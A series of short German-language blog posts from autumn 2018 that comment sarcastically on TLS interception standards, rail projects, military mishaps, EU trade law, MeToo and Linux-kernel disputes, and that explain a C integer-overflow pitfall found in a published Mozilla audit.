[l] Fandet ihr TLS auch viel zu sicher? Da kann man ja gar nicht mitschnüffeln! Das geht nicht. Wie soll der Arbeitgeber denn dann die TLS-Verbindungen aufbrechen und gucken, dass da keine Pornos oder Malware reinkommt?! Nee, das geht so nicht. Verschlüsselung ist nur wirklich sicher, wenn man die unterwegs entschlüsseln kann.
Findet jedenfalls die ETSI und nennt ihre kaputtgemachte Version von TLS 1.3 "eTLS". e nicht für elektronisch sondern für "Enterprise". Fuck, yeah!
Aber der Höhepunkt der Meldung ist, wie sich völlig unironisch das zuständige Kommittee nennt:
ETSI Technical Committee CYBER has recently released a Middlebox Security Protocol specification
Kannste dir gar nicht ausdenken sowas.

Fri Nov 9 2018

[l] Old and busted: Stuttgart 24.
New hotness: Frankfurt 21!
Ein Bahn-Tunnel von Offenbach bis Frankfurt-Niederrad, ein ICE-Bahnhof unter der Erde: Auf diese Idee aus dem Bundesverkehrsministerium gibt es in Hessen geteilte Reaktionen.
Bestimmt "begeistert" und "sehr begeistert"! Nach den guten Erfahrungen, die Stuttgart mit unterirdischen ICE-Bahnhofsprojekten gemacht hat!
Ich schlage vor, Frankfurt prüft vor dem ersten Spatenstich auf Juchtenkäfer :-) (Danke, Robert)

Thu Nov 8 2018

[l] Die Nato hat ja ein fettes Manöver gemacht diese Tage, um Russland mal so richtig zu zeigen, wo der Hammer hängt.
Russland hat dann ein Gegenmanöver gemacht und ein paar Raketen in die Peripherie des Nato-Manövers geschossen, mit Ankündigung versteht sich und nicht um jemanden zu treffen.
Aber ein Schiff der Nato-Übung hat ist trotzdem schwer beschädigt, eine norwegische Fregatte:
Die Fregatte „KNM Helge Ingstad“ hatte 137 Mann Besatzung an Bord. Alle konnten gerettet werden. Acht Menschen wurden leicht verletzt. Das Schiff schlug leck und bekam Schlagseite.
Russische Rakete? Feindliches U-Boot? Seeminen? Nein! Die sind mit einem Tankschiff kollidiert!

Tue Nov 6 2018

[l] Endlich tut mal jemand was für die armen unterdrückten Marktteilnehmer, Nestlé und Unilever.
Um kleine und mittelgroße Agrarbetriebe vor unfairen Handelspraktiken zu schützen, brachte die EU-Kommission vor einiger Zeit eine Richtlinie auf den Weg. Die UTP-Richtlinie („unfair trading practices“) sollte Bauern davor bewahren, dass Handelsketten Verträge nachträglich ändern, Bestellungen stornieren oder die Ware erst mit Verzögerung bezahlen.
Klingt nicht schlecht. War es auch nicht. Bis jemand von der CSU es angefasst hat. Die CSU ist ja sowas wie der Anti-Midas. Was die anfassen, wird zu Scheiße.
Bislang verhandeln nämlich die Edeka- und Rewe-Zentralen mit den überregionalen Lieferanten. Die gebündelte Einkaufsmacht sorgt für gute Konditionen, was Lieferbedingungen und Preise angeht. Ginge es nach dem Europaparlament, wäre das künftig verboten. Nonn ist entsetzt.
Ja gut, Rewe und Edeka zerschlagen ist ja eine Sache. Wo kommen Nestlé und Unilever ins Spiel? Hier!
Was den Händlern das Leben zusätzlich erschwert, ist ein weiterer Coup der Parlamentarier. Sie haben beschlossen, dass nicht nur kleine Bauernbetriebe, sondern auch große Lebensmultis wie Nestlé und Unilever unter den Schutz der Richtlinie fallen sollen.
Das erinnert mich an den Film "The Corporation". Falls ihr den noch nicht kennt: Holt das nach! Ist ein alter VHS-Film, von dem es ranzige Versionen auf Youtube und co gibt, wenn man ein bisschen sucht. Die beschreiben dort, wie die Idee, dass eine Corporation eine juristische Person ist, eine pervertierung der Abschaffung der Sklaverei ist. Auf entsprechende gesetzliche Regelungen haben sich dann nämlich plötzlich nicht wie geplant Schwarze berufen, sondern Firmen. Das war der Startschuss für die Idee der juristischen Person. Gut gemeint ist halt das Gegenteil von gut gemacht.
Update: Stellt sich raus: Hier gibt es eine brauchbare Version von The Corporation, von archive.org statt youtube, d.h. geht auch nicht weg, wenn ich drauf linke. Sehr schön! Englisch muss man allerdings sicher können. (Danke, Tobias)
[l] Da war meine Fantasie noch nicht apokalyptisch genug für die Realität: Bei plötzlichem Herzstillstand wird Frauen von Umstehenden seltener geholfen als Männern. Also hat eine Professorin mal eine kleine Umfrage unter 50 Leuten gemacht:
Die Teilnehmer sagten unter anderem, sie würden sich Sorgen machen die Frau versehentlich zu verletzen. Einige gaben außerdem an, sie hielten Wiederbelebungsversuche wegen der Brüste für schwieriger oder hätten Sorge, wegen sexueller Belästigung beschuldigt zu werden.
Besonders krass: Sie haben dann ein VR-Experiment gemacht. Selbst wenn die zusammenbrechende Person virtuell war, haben Leute Frauen weniger geholfen. Vermutlich weil es nicht so sehr darum ging, ob die Frau selbst dich wegen sexueller Belästigung anzeigt, sondern ob ein Passant das sieht und dich anzeigt. Wow.
Oder das ist noch krasser und aus der Angst vor Metoo-Style Karrieremord ist jetzt eine veritable Gynophobie geworden, wie mein Einsender vermutet. (Danke, Peter)

Mon Nov 5 2018

[l] SWIFT verweigert wegen neuer US-Sanktionen dem Iran die Zusammenarbeit. Damit ist der Iran vom weltweiten Banking abgeschnitten. Nur weil Trump was für den Wahlkampf brauchte. Und weil der Iran den deal mit Obama gemacht hatte, nicht mit ihm.

Wed Oct 31 2018

[l] Erinnert ihr euch an die ungarische Fotografin, die 2015 Flüchtlinge getreten hat und dabei gefilmt wurde?
Ja?
Nun, die ist jetzt freigesprochen worden. Begründung:
Der OGH urteilte, das Verhalten der Journalistin sei zwar "moralisch falsch und illegal" gewesen. Aber L. Vergehen habe nicht den Straftatbestand des Landfriedensbruches erfüllt. Zu diesem hätte gehört, dass die Tat die öffentliche Ruhe und Ordnung störe, was nicht der Fall gewesen sei. Vielmehr habe sich die Frau einer "Störung" schuldig gemacht, erklärte das Gericht. Dabei handle es sich um ein Bagatelldelikt, das inzwischen verjährt sei.

Wed Oct 24 2018

[l] München: U-Bahnfahrer vergewaltigt 18-Jährige. Die Frau war stark alkoholisiert eingeschlafen und hatte die Endhaltestelle verschlafen.
Money Quote:
Nach dem Vorfall bot die die MVG der Vergewaltigten an, einmal kostenlos mit der Party-Tram zu fahren.
What the? I don't even!
Update: Hier das Statement der MVG dazu:
Es ging nicht um eine „Entschädigung“ oder Wiedergutmachung, sondern schlichtweg um ein Zeichen unserer Anteilnahme und Unterstützung. Wir wollten unsere Bestürzung über die mutmaßliche Tat und unser aufrichtiges Bedauern zum Ausdruck bringen. Uns war daran gelegen, der Dame zu verdeutlichen, dass uns dieser Fall sehr betroffen gemacht hat und wir im Rahmen unserer Möglichkeiten helfen wollen. Ferner wollten wir ihr auch persönlich mitteilen, dass der beschuldigte Mitarbeiter nicht mehr als U-Bahnfahrer tätig ist und unser Unternehmen verlassen hat. Unsere Hoffnung war, damit auch einen Beitrag dazu zu leisten, dass die Kundin die MVG infolge der Geschehnisse nicht nur negativ wahrnimmt.
Unser Mitarbeiter hatte der Dame vorgeschlagen, eine Sonderfahrt mit einer Trambahn zur Verfügung zu stellen. Die Fahrt hätte die Kundin nach eigenen Wünschen selbst gestalten können. Eine Sonderfahrt ist eine exklusive Fahrt außerhalb des regulären Linienbetriebs, keine öffentliche Veranstaltung. Von uns aus waren wir allerdings nicht auf eine Sonderfahrt festgelegt. Es handelte sich um einen gut gemeinten Vorschlag. Selbstverständlich hätte die Kundin auch andere Vorstellungen artikulieren können. Dies wurde ihr auch so gesagt.
[l] Kurze Durchsage der Digital Transformation Agency von Australien:
for every use of blockchain you would consider today, there is a better technology
Wot? Es gibt Behörden, die nicht auf den Kopf gefallen sind?! Schnell, rufe mal jemand Australien an und finde heraus, was die anders gemacht haben!!1!

Wed Oct 17 2018

[l] Ich bin heute und morgen in Heidelberg bei der Heise Devsec 2018 und halte heute nach der Mittagspause meinen Vortrag. Ich komme gerade aus einem Vortrag, in dem es darum ging, dass die fiesen Security-Leute ja häufig selber gar nicht programmieren können und kommunikativ ein Handycap haben und nicht wissen, wie sie die Entwickler da abholen, wo sie sind. Ein Beispiel aus dem Publikum war, dass so ein Security-Fuzzy dem armen Entwickler gesagt hatte, sein SSL-Zertifikat sei falsch und müsse repariert werden, aber der hatte gar nicht gesagt, was da jetzt konkret falsch ist und wie man das besser macht.
Diese Einstellung hört man glücklicherweise inzwischen nur noch sehr selten, und das begrüße ich. Meiner Erfahrung nach sind Entwickler im Allgemeinen interessiert daran, eine gute Arbeit zu machen. Und das beinhaltet: Keine Sicherheitslücken produzieren.
Ich habe schon häufig erlebt, dass Entwickler mit mir über Bugs verhandelt haben, aber das hatte immer falsche Anreize in der Organisation als Hintergrund. Sowas wie: Ich kriege einen Bonus, wenn ich keine Bugs habe. Du hast hier gerade Bugs aufgemacht, das killt meinen Bonus, daher bestreite ich die jetzt alle.
Man stelle sich mal vor, ein Architekt argumentiere so. Sagen wir mal: Ein Klimaforscher sagt: Wir haben Klimawandel, die Stürme werden stärker, ihr müsst eure Statik jetzt auf mehr Windstärke auslegen. Und die Architekten sagen dann: Der böse Klimaforscher hat mir gar nicht erklärt, was ich da genau tun muss jetzt!1!!
Undenkbar, da sind wir uns hoffentlich alle einig. Das sollten wir auch Software-Entwicklern nicht durchgehen lassen. Glücklicherweise kommt das auch jetzt schon so gut wie nicht vor, jedenfalls meiner Erfahrung nach.
Update: Ich sollte das nochmal explizit sagen: Das ist nicht die Realität. Jedenfalls nicht in meiner Erfahrung. Der Report erwähnt mindestens den Fachbegriff Integer Overflow, danach kannst du googeln und dann findest du, wie man das fixt. Oder der Report verweist auf intsafe/safeint oder die entsprechenden gcc/clang-Builtins. Und das ist auch bei ... weniger seriösen Marktteilnehmern so, weil das ein einfacher Weg ist, den Report zu strecken. Daher ist das eine akademische Diskussion hier. Ich bin aber der Meinung, dass jemand, der nicht weiß, was ein Zertifikat kaputt macht, die Finger von Code lassen sollte, der mit Zertifikaten hantiert.

Sun Oct 14 2018

[l] Gute Nachrichten für Kampfflugzeugbauer: Hurricane Michael hat der US Air Force F-22 im Wert von einer Milliarde Dollar plattgemacht.
Und auch in Belgien braucht es keinen Feindkontakt: In einer bemerkenswerten Slapstick-Aktion hat sich die Belgische Luftwaffe ein F-16 zerstört und eine beschädigt. Die Techniker-Crew kam bei der Wartung an den Feuerknopf, die Kanone traf den frisch befüllten Tank der anderen Maschine, die explodierte und brannte aus und beschädigte dabei den Schützen und sein Gerät.

Fri Oct 12 2018

[l] Wer schon immer mal TLS verstehen wollte: Hier hat jemand eine großartige Zum-Durchklicken-Webseite dazu gemacht und er verwendet auch gleich curve25519 <3
[l] In Österreich haben die Rechtspopulisten in den Dörfern dazugewonnen, durch die vor 500 Jahren die Türken gezogen sind. Aber erst, seit sie damit Werbung gemacht haben.
Wow. Das ist halt doch kein Scherz mit dem Echsenhirn.

Thu Oct 11 2018

[l] Mozilla hat ihren Update-Service auditieren lassen und den Report veröffenticht. Der Report sieht soweit ordentlich gemacht aus, bis auf ein Detail: Bug 5.1.9 behauptet, dass wenn man auf einer 64-bit Plattform uint32_t+uint32_t+uint32_t macht, dass es dann nicht zu arithmetischem Überlauf kommt. Das stimmt nicht. Ich blogge das hier, weil das eine häufige Fehlannahme ist. Testprogramm: intof-64bit.c. Nur weil das am Ende in malloc geht und malloc size_t nimmt (64-bit), heißt das nicht, dass die Addition auf zu 64-bit-Zwischenwerten arbeitet. Das findet man in Code auch häufig in der Form
```
  (size_t)(uint1+uint2)
```
Selbe Annahme, genau so falsch. Der Cast nach size_t findet nach der Addition und dem arithmetischen Überlauf statt.
Mozilla verteilt die Updates über http aber ein Manifest über https, wo Hash-Werte der Dateien drinstehen. Das ist ein etabliertes Muster, das man früher häufig angewendet hat, weil die Mirrors oder das CDN nicht https konnten. Die Zeiten sind vorbei, aber es ist nicht per se unsicherer. Ich hätte das nicht angekreidet. Der Report argumentiert, dass man sehen kann, für welche Plattform jemand Updates zieht. Ja, aber das kann man auch bei https anhand der Menge der übertragenen Bytes sehen. Die Installer oder Updater für verschiedene Pattformen sind ja nicht alle gleich groß.
Die meisten Probleme waren in der Management-Oberfläche. Das ist nicht überraschend, so sieht das häufig aus in der Praxis. Im Updatemechanismus selbst haben sie keine schlimmen Dinge gefunden, und der Bericht sieht ordentlich gemacht aus. Das sind also gute Nachrichten für alle Firefox-Benutzer.
Ich muss ja sagen, dass ich das einen sehr erfreulichen Trend finde, dass Open Source-Projekte nicht nur Audits machen sondern dann die Berichte veröffentichen.
Update: Mir hat einer der Autoren des Reports geschrieben und erklärt das Missverständnis mit dem Overflow. Und zwar gibt es da einen anderen Check, bei dem in der Tat ein sizeof() Teil der Addition ist. Insofern haben die sich in ihrem Finding nicht geirrt (das wollte ich auch nicht unterstellen), aber die Formulierung war missverständlich. Es gibt da aber übrigens immer noch Komplikationen:
```
printf("%lu %lu",1+15+0xfffffff0u+(size_t)10,(size_t)10+0xfffffff0u+1+15);
```
Das ergibt mit gcc 8.2 auf x86_64-linux:
```
10 4294967306
```

Sat Oct 6 2018

[l] Die Identitären haben das Büro einer Flüchtlinge-Seenotretter-NGO gestürmt. Immerhin haben sie anscheinend niemanden verletzt und nichts kaputtgemacht. Dennoch:
Zum Zeitpunkt des Vorfalls befanden sich etwa fünf bis sechs Mitarbeiter der NGO vor Ort. Sie verschanzten sich in einem Raum und warteten auf das Eintreffen der Polizei. Die Exekutive nahm vor Ort 22 Menschen vorläufig fest. Laut SOS Méditerranée geht es den betroffenen Mitarbeitern gesundheitlich gut – sie stehen allerdings unter Schock.
22 Festnahmen klingt jetzt nicht wie ein netter Besuch unter Freunden.
[l] Herzlichen Glückwunsch, liebe Metoo-Crowd. Ihr habt Brett "Abtreibungen gehören verboten" Kavanaugh ins Amt gehoben und ihr helft der GOP gerade über die Midterm Elections.
Stellt sich völlig überraschend raus: Wenn du Leuten ins Gesicht sagst, dass du sie für irreparabel ekelhafte Arschlöcher hälst, dann gehen die das nächste Mal wählen und wählen für die andere Seite.
Schade. Nichts gelernt aus dem Hillary-Wahlkampf mit dem Basket of Deplorables. Den selben Fehler nochmal gemacht, und ein anderes Ergebnis erwartet. Voll schlau!
Hätte euch doch nur jemand gewarnt!!1!
Tja. Und wenn die GOP die Midterms überlebt, dann kriegt Trump auch seine zweite Amtszeit. Da habt ihr ja ganze Arbeit geleistet!
Wobei hey, vielleicht ist das ja gar nicht schlecht. Leichte Schläge in die Fresse sollen ja das Denkvermögen anregen. Ich hab einen tollen Vorschlag: Macht genau weiter so! Wenn die Naturheilkunde nicht hilft, musst du die Dosis erhöhen, bis sie hilft (oder der Patient tot ist)!
Update: Ach Gottchen, jetzt schlagen hier die "aber die Republikaner sind Terroristen"-Leute auf. Ja und? Die Democrats etwa nicht? Aber aber die Republikaner haben Gerrymandering gemacht! Mit Duldung und Unterstützung der Democrats, die auch Gerrymandering gemacht haben! Aber aber aber die Missbrauchsopfer sind doch Missbrauchsopfer! Ja, und wenn man es mit dem Verfolgen der Täter belassen hätte, wäre vermutlich alles gut gewesen. Stattdessen: Trump bleibt im Amt aber Al Franken muss zurücktreten. Kein Wunder, dass die "das ist nicht faktenbasiert sondern eine Hexenjagd"-Rhetorik der Republikaner jetzt volls ins Mark trifft, selbst bezogen auf Brett "Boofing" Kavanaugh! Und dann muss Asia Argento zugeben, dass sie auch Täterin ist — Effekt: keiner. Nee, die ist ne Frau, das zählt nicht. Metoo!!1! Ja was habt ihr denn gedacht, was für eine Botschaft das sendet, was passieren würde?!
Update: Wow, jetzt kommen hier Mails rein, aber Metoo sei doch darum gegangen, Frauen Mut zu machen und so. Habt ihr #menaretrash schon wieder vergessen?!

Thu Oct 4 2018

[l] Die Chinesen haben anscheinend Supermicro-Mainboards Hardware-trojanisiert. Supermicro ist einer der größten Hersteller von Server-Mainboards in der Welt. Das ist eine US-Firma (sitzt in San Jose), aber ihre Mainboard werden in China gefertigt, wie eigentlich auch sonst alle IT-Technik.
Und da war jetzt ein Chip verbaut, der da nicht hin gehörte. Das fand ein Dienstleister raus, den Amazon mit Due Diligence beauftragt hatte, weil sie eine Firma namens Elemental kaufen wollten, die Video-Kompression als Appliance anbot.
Amazon reported the discovery to U.S. authorities, sending a shudder through the intelligence community. Elemental’s servers could be found in Department of Defense data centers, the CIA’s drone operations, and the onboard networks of Navy warships. And Elemental was just one of hundreds of Supermicro customers.
Und das war anscheinend keine kleine Operation, die die Chinesen da gefahren haben.
The chips had been inserted during the manufacturing process, two officials say, by operatives from a unit of the People’s Liberation Army.
Leider sagen sie nicht, welche Firma da Due Diligence gemacht und die Chips gefunden hat. Das würde mich ja mal interessieren, WTF das für ein Laden ist, und was da für Leute sitzen, dass die sowas erkennen können. Nicht dass das am Ende eine Legende für eine NSA-Operation war.
Wisst ihr noch, wie alle über Dragos gelacht haben, als der behauptete, von Geheimdiensten mit airgap-bridging Hardware-Trojanern infiziert worden zu sein?
Update: Oh Mann, dabei ist die Lösung so einfach! (Kontext)
Update: Bloomberg hat von allen Betroffenen umfangreiche Dementis erhalten. Die sind inhaltlich ziemlich unwieselig und vollumfänglich. Wirkt ein bisschen, als hätte Bloomberg sich das komplett aus dem Arsch gezogen.

Sun Sep 30 2018

[l] Habt ihr euch auch solche Sorgen um Maaßen gemacht? Wie soll der Arme mit so wenig Gehalt überleben!
Nun, keine Sorge. War gänzlich unbegründet. NATÜRLICH kriegt Maaßen mehr Geld jetzt. Wo kämen wir da hin!

Sun Sep 23 2018

[l] Matthew Green mit ein paar wichtigen, wahren Worten über Chrome. Chrome hat kürzlich eine Änderung gemacht, so dass Einloggen in einem Google-Account einen automatisch auch bei Chrome einloggt (und umgekehrt nehme ich an).
Mich betrifft das nicht, weil ich mich weder bei Chrome noch bei Google einlogge, und im Übrigen Firefox benutze. Aber ich sehe das inhaltlich ähnlich. Das ist ein Vertrauensbruch, und eine gute Gelegenheit, Chromes Marktanteil mal ein bisschen zu senken.

Fri Sep 21 2018

[l] Neulich gab es im New York Review of Books einen Artikel von Jian Gomeshi. Falls euch der Name nichts sagt: Kontext, Mehr Kontext. Radiomoderator aus Kanada. Wurde von 20 Frauen des sexuellen Übergriffs und der Vergewaltigung bezichtigt, die üblichen "glaubt immer den Opfern!1!!"-Leute sprangen auf, und dann kam vor Gericht raus, dass sich keiner der Vorwürfe halten ließ. Gomeshi wurde freigesprochen. Aber wie das so ist, wenn man einmal als Shitlord "enttarnt" ist: Die Karriere ist hin. Seinen Job beim Radio ist er los, sozial ist er jetzt Ausgestoßener.
Der New York Review of Books hat ein Heft über das Thema gemacht, wie das ist, wenn man vor Gericht unschuldig ist, aber in den sozialen Medien geächtet. Also haben sie den Gomeshi obigen Artikel schreiben lassen. Das ist jetzt inhaltlich nicht vom Hocker hauend in Sachen Neuigkeitswert, es ist im Wesentlichen so, wie man sich das vorstellt. Aber wenn wir schon "glaubt immer dem Opfer!1!!" sagen, und er freigesprochen wurde, dann ist er halt in diesem Fall das Opfer. Es sollte also unkontrovers sein, ihn zu Wort kommen zu lassen, oder? Auch wenn er da den vor Selbstmitleid zerfließenden armen Schlucker gibt?
Nun, ihr werdet euch schon gedacht haben, was als nächstes passierte.
Der Chefredakteur vom New York Review of Books muss gehen. Unter Karrierevernichtung machen es die Hassmobs halt nicht. Und sie treiben vor sich eine Bugwelle aus Verängstigten her, die aus Angst, ihre Karriere zu verlieren, lieber Andere unter den Bus werfen.
Bei solchen Situationen kommt immer das Schlimmste aus den Menschen zum Vorschein. Ich halte das auch für eine der treibenden Mechanismen dahinter, wie der Faschismus in Europa die Macht übernehmen konnte. "Lieber die als mich!" (Danke, Helmut)

Thu Sep 20 2018

[l] Hatte ich nicht mal eine Kategorie für Leute, die mich wüst beschimpfen? Ich finde die gerade nicht wieder. Hmm. Ich war mir sicher, ich hätte sowas mal gemacht. Die hieß irgendwie "Halt die Fresse du Nazi" oder so.
Na egal. Mache ich sie halt jetzt auf. :-)
Erster Eintrag: Dieser wohlerzogene Golem-Forist:
Fefe hat keine Ahnung, und ist ohnehin seit langem der Ober-Bully der deutschen Bloggerszene, und wenn du dich mit Androzentrismus und der neuen Rechten ungerechtfertigt in Verbindunggebracht fühlst, dann ist es etwas ungeschickt, einen der lautesten und asozialsten Wortgeber der deutschen Maskulistenszene, einem besonders widerlichen Teil der neuen rechten Bewegungen, als Quelle anzuführen.
Wie und meinen offensichtlichen Antisemitismus findet er nicht erwähneswert!? Ich bin enttäuscht!
Geht weiter unten noch weiter. Gefragt, ob Antikapitalismus, Antirassismus, Eintreten für gerechtere Verteilung der Vermögen und Kampf gegen Massenüberwachung mich nicht eher zu einem Linken machen, kommt diese bedenkenswerte Beobachtung:
Rechter Antikapitalismus ist halt gerade en vogue. Und wenn er dabei noch so viele richtige Ideefragmente hätte, macht das die asozial-reaktionäre Tendenz seiner unsäglichen Tiraden gegen wesentliche zivilisatorische Errungenschaften im Umgang miteinander, und Ansätze, diese weiter zu verbessern, keinen Millimeter besser.
Dem ist halt der zwischenmenschliche Umgang besonders wichtig! Das erkennt man auch an Worten wie *hochscroll* "Ober-Bully" und "asozialster Wortgeber der deutschen Maskulistenszene". Wenn ich von solchen Leuten ernst genommen werden möchte, muss ich einfach auch auf dem Niveau agieren! Ganz einfach!
Update: Seid ihr eigentich auch so froh, dass Hate Speech-Bekämpfung bei uns in Deutschland jetzt Chefsache ist? Endlich nimmt das mal jemand ernst!
Update: Hah, ein anderer Einsender schreibt:
Nunja, wieso ich mich eingentlich nochmal melde, ist dass einige meiner Golem Posts (mit nahezu dem gleichen Inhalt der Mail an dich) verschwunden sind, und heute lese in in der Inbox:
```
Re: RIP Linux
Von [zensiert] (Golem.de) 20.09.18 09:45
An: [zensiert]
Hallo [zensiert],
da der Begriff SWJ derzeit vor allem als Provokation benutzt wird,
möchten wir den auch in unserem Forum nicht zulassen, wenn er
entsprechend benutzt wird. Wir wollen damit keine Meinungen
unterdrücken, es geht lediglich darum, dass niemand diskriminiert wird
und sachlich-faire Diskussionen möglich sind. Um Missverständnisse zu
vermeiden, bitte ich auch in diesem Fall um Verständnis.
Mit freundlichen Grüßen,
[zensiert] (Golem.de)
```
Oh ach soooo! Es geht hier um sachlich-faire Diskussionen! Daher muss Hate-Speech wie "SJW" entfernt werden! Pro-Tipp: Beschimpf die Gegenseite lieber als "Ober-Bully" oder "asozialster Wortgeber der deutschen Maskulistenszene". Das drückt Respekt und Hochachtung aus und dient dem positiven Gesprächsverlauf.
Update: Ein Leser hat die Kategorie wiedergefunden. Sie hieß "Subject: Du Nazifreund"! (Danke, Julian)
[l] OK, nachdem ich das jetzt dem 8. per Mail erklärt habe, und immer noch neue nachkommen, die es erklärt brauchen: Jetzt erkläre ich die Linus-Tiraden im Blog.
Hier ist, was ich dem letzten per Mail geschrieben habe:
Früher war es so, dass Freiwillige sich auf der Mailingliste gemeldet haben, und ihren Code geschickt haben. Linus hat ihnen erklärt, was sie noch nachbessern müssen, um reinzukommen, sie haben das gefixt, und wurden reingelassen. Alles gut.
Manche kriegen Kritik an ihrem Code, nehmen das persönlich, und entdecken dann ihre anale Phase, pinkeln in die Ecke, machen laute Musik an, stören die anderen. Auf einer Mailingliste kann man da nicht wirklich viel gegen tun. Du kannst denjenigen runterschmeißen, klar, aber dann macht der sich ne neue Mailadresse und kommt wieder.
Später gab es dann Firmen wie Redhat, die haben Leute dafür bezahlt, dass sie Dinge tun. Und als ihnen auffiel, dass die Wartung von Software teurer ist als das Schreiben von Software, haben sie sich gedacht: Die Kosten externalisieren wir doch mal an die Community! Und sie haben ihren Scheiß auf die Mailinglisten gekippt. Linus hat das dann zurückgewiesen. Aber jetzt haben wir eine fundamental andere Ausgangsbasis. Wir haben Leute, die von ihrem Arbeitgeber dafür bezahlt werden, destruktive Dinge zu tun. Die haben dann (einige, nicht alle!) die Kritik einfach ignoriert. Genau so weitergemacht. Immer den selben Scheiß wieder eingereicht. Nach dem Motto: Wehr dich, solange du willst, ich werde hier bezahlt und sitze das aus. Weniger Arbeit für mich.
Und da gehen Linus irgendwann die Optionen aus. Was schlägst du vor, was er tun soll? Seine Strategie war, das dann über ein halbes Jahr oder so (guck selbst auf der Mailingliste! Nichttriviale Zeiträume!) den Ton zu verschärfen. War das die beste Strategie? Vermutlich nicht.
Aber es ist keinesfalls so, dass "der olle Linus halt mal wieder ausfällig wird". Das sind kumulierte Eskalationsstrategien, die das Ziel hatten, Redhat als Firma zum Einschreiten zu bringen. In einigen Fällen hat es auch funktioniert, übrigens.
Die Mails, die da zitiert wurden, sind jedenfalls nicht "Linus tickt halt aus". Das ist "Linus hat dir das jetzt ein fucking JAHR lang erklärt und du sabotierst hier immer noch das Projekt?!".
Redhat ist mehrfach negativ aufgefallen in der Richtung. Der Kay, um den es in der von mir verlinkten Mail ging, ist auch Redhat-Mitarbeiter. Aus dem systemd-Umfeld. Die haben sich echt massivst danebenbenommen, und als Linus sie nicht im Kernel brandschatzen ließ, haben sie seinen Kernel halt aus dem Userspace sabotiert.
Update: Ich hatte das alles schonmal erklärt, sehe ich gerade.

Tue Sep 18 2018

[l] Nachdem jetzt der Vierte wissen will, was blauhaarige Schneeflocken und Bronies sind, erklär ich es mal öffentlich. So hab ich mir das ja nicht vorgestellt :)
Eine Schneeflocke ist ein Kind, das in den Zeiten aufgewachsen ist, wo alle Kinder voll einzigartig und wunderbar sind. Das sind die Kinder, die bei einem Rennen von drei Läufern den 3. Siegerplatz belegen, denn Verlierer gibt es bei uns nicht. Kinder, die in ihrer Kindheit nie Grenzen aufgezeigt bekommen haben, bei denen also die Eltern die Sozialisierung voll verkackt haben. Kinder, die jetzt groß geworden sind, und sich beim kleinsten Gegenwind auf den Boden werfen und strampeln, weil ihnen die Eltern das auch immer haben durchgehen lassen.
Ein Brony ist jemand, der My Little Pony geil findet. Googelt selbst. Nein, das ist kein Scherz. Würde ich euch mit sowas belügen?! Ehrlich! Wenn ihr eine Bildersuche auf Brony macht, werdet ihr auch sehen, wieso ich blauhaarig schrieb.
Einhörner sind eine Unterkategorie.
Was für Vorurteile schwingen da mit? Siehe oben, und: Lebensunfähige Egozentriker und Narzissten. Geistig weit in der Entwicklung hinter ihrem Körper hinterherhängend.
Wohlgemerkt: Inkompetent oder schlechte Programmierer ist nicht Teil der Vorurteile. Und ich habe mir auch keines dieser Vorurteile zueigen gemacht. Ich erwähne das hier als Teil meines Bildungsauftrags (*SEUFZ*) und weil ich explizit gefragt wurde.
Ich beobachte bloß, dass unter den sich von Linus verletzt fühlenden Menschen Schneeflocken und Bronies deutlich überrepräsentiert zu sein scheinen.
Ein Einsender hat mir vorgeworfen, was ich besonders verletztend finde, Snowflake sei ja ein Alt-Right-Begriff, den ich mir zu eigen machen würde. Frechheit! Ich hab schon FDPler als Schneeflocken beschimpft, bevor es die Alt-Right gab!

Wed Sep 12 2018

[l] Die Bundesregierung will jetzt doch endlich zurückhacken.
Die Bundesregierung arbeitet an "rechtlichen Rahmenbedingungen" um offensiv zurückhacken zu können. Das erklärten hochrangige Vertreter auf dem vom Behördenspiegel veranstalteten Kongress Public IT-Security. Andreas Könen, Abteilungsleiter Cyber- und Informationssicherheit im Bundesinnenministerium (BMI), sprach sich dafür aus, dass die "richtigen Behörden" eine rechtliche Grundlage für die "aktive Cyberabwehr" bekommen.
Uiuiuiui, "aktive Cyberabwehr", ja?
Und sie haben die Frechheit, das auch noch unter "Security" laufen zu lassen.
Ich stell mir gerade vor, wie die Profispezialexpertenhacker des Innenministeriums einen Portscan an der Firewall detektieren und zurückhacken wollen, bei einem Script Kiddie in Russland rauskommen und dann von dem so nass gemacht werden, dass die Infrastruktur danach wochenlang nicht verfügbar ist. Welcher fitte Hacker arbeitet denn bitte freiwillig für das Innenministerium!?
Update: Falls jemand von euch vergessen hat, wie "aktive Verteidigung" im der polizeistaatlichen Praxis aussieht: Na wie bei der No-Name-Crew damals!

Mon Sep 10 2018

[l] Ich bin ja, wie einige von euch wissen, ein passionierter C-Programmierer. C hat leider ein paar Nachteile in der Praxis, die man mit sorgfältiger Arbeit umgehen kann, aber wer hat heutzutage schon noch die Zeit, sorgfältig zu arbeiten. Typische Probleme in C-Code sind Buffer Overflows und Integer Overflows. Beides muss man nicht im Code haben, und es gibt natürlich auch andere Fehlerklassen, und es gibt auch Fehlerklassen anderer Programmiersprachen, die in C nicht vorkommen. Aber wenn man Buffer Overflows und Integer Overflows mal an der Wurzel lösen könnte, dann wäre viel erreicht.
Ein Ansatz dafür war C++. In C++ ging es natürlich auch um einen Haufen anderer Dinge, aber es ging eben auch darum, Dinge, die häufig auf die Fresse fallen, wegzuabstrahieren. Man arbeitet nicht mehr mit C-Strings, die mit in-band-Signaling arbeiten (0-Byte = Stringende), sondern man hat eine String-Klasse, und die kennt die Länge. Niemand muss mehr mit strlen über alle Bytes iterieren, um die Länge zu finden.
Aber das ist ja nicht das einzige Problem in strings. Nehmen wir mal an, du hast einen String s, und willst das 100. Zeichen davon haben.
Dann machst du in C oder C++ s[99].
Was aber, wenn der String bloß eine Länge von 10 hat?
Tja, das ist dann ein Bug. Nun könnte man, wenn man eine Klasse in C++ hat, den operator[] überladen, und wenn der Index negativ oder größer als die Stringlänge ist, dann könnte man das erkennen und beispielsweise eine Exception werfen. Dafür sind die da. Für genau sowas.
Aber ... macht C++ das? Nein, machen sie nicht! Der Standard lässt das offen, ob die Implementation das abfangen soll oder nicht. Und dreimal dürft ihr raten, was die Implementationen da draußen folgerichtig alle machen! Richtig! Nicht checken.
Diese Art von Nachlässigkeit ärgert mich auf einem sehr fundamentalen Level. Da krieg ich Pickel und Bluthochdruck von. Wenn du schon den Aufwand auf dich nimmst, eine Abstraktion einzuziehen, dann gibt es echt keine Ausrede, da nicht auch gleich eine Fehlerklasse auszuschließen.
